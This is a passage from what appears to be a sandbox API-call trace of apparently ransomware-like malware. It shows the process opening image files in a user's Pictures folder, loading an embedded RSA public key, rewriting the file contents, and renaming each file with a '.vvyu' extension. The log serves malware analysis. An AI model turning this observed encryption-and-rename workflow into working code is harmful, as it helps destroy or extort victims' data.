Size=0x10e) returned 0x6d5c88 [0192.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0192.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.910] GetCurrentThreadId () returned 0x264 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45560 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.911] GetCurrentThreadId () returned 0x264 [0192.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0192.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0192.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39df0 [0192.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e50 [0192.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0192.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0192.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0192.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e68 [0192.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e08 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dd8 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0192.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0192.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0192.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d10 | out: hHeap=0x6a0000) returned 1 [0192.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.924] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x114dc, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x114dc, lpOverlapped=0x0) returned 1 [0192.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.925] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x114e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.925] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.926] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.926] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.927] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.927] CloseHandle (hObject=0x584) returned 1 [0192.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0192.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d45778 [0192.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0192.929] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\GwAL3j0fQyIFxx-jKJ.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\gwal3j0fqyifxx-jkj.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\GwAL3j0fQyIFxx-jKJ.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\gwal3j0fqyifxx-jkj.gif.vvyu")) returned 1 [0192.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.931] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0192.934] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3c0b150, ftCreationTime.dwHighDateTime=0x1d8976f, ftLastAccessTime.dwLowDateTime=0xb8485190, ftLastAccessTime.dwHighDateTime=0x1d8a098, ftLastWriteTime.dwLowDateTime=0xb8485190, ftLastWriteTime.dwHighDateTime=0x1d8a098, nFileSizeHigh=0x0, nFileSizeLow=0x16694, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJwMptujDhUTwyI.gif", cAlternateFileName="IJWMPT~1.GIF")) returned 1 [0192.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0192.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0192.934] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\iJwMptujDhUTwyI.gif") returned=".gif" [0192.934] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\iJwMptujDhUTwyI.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\ijwmptujdhutwyi.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.935] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=91796) returned 1 [0192.935] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.938] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1666e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.938] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.940] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.940] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x16694, lpOverlapped=0x0) returned 1 [0192.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.941] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0192.942] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.942] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.942] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.943] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.943] GetLastError () returned 0x0 [0192.943] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.943] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0192.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.943] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.943] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.943] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16690) returned 0x2d45778 [0192.944] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 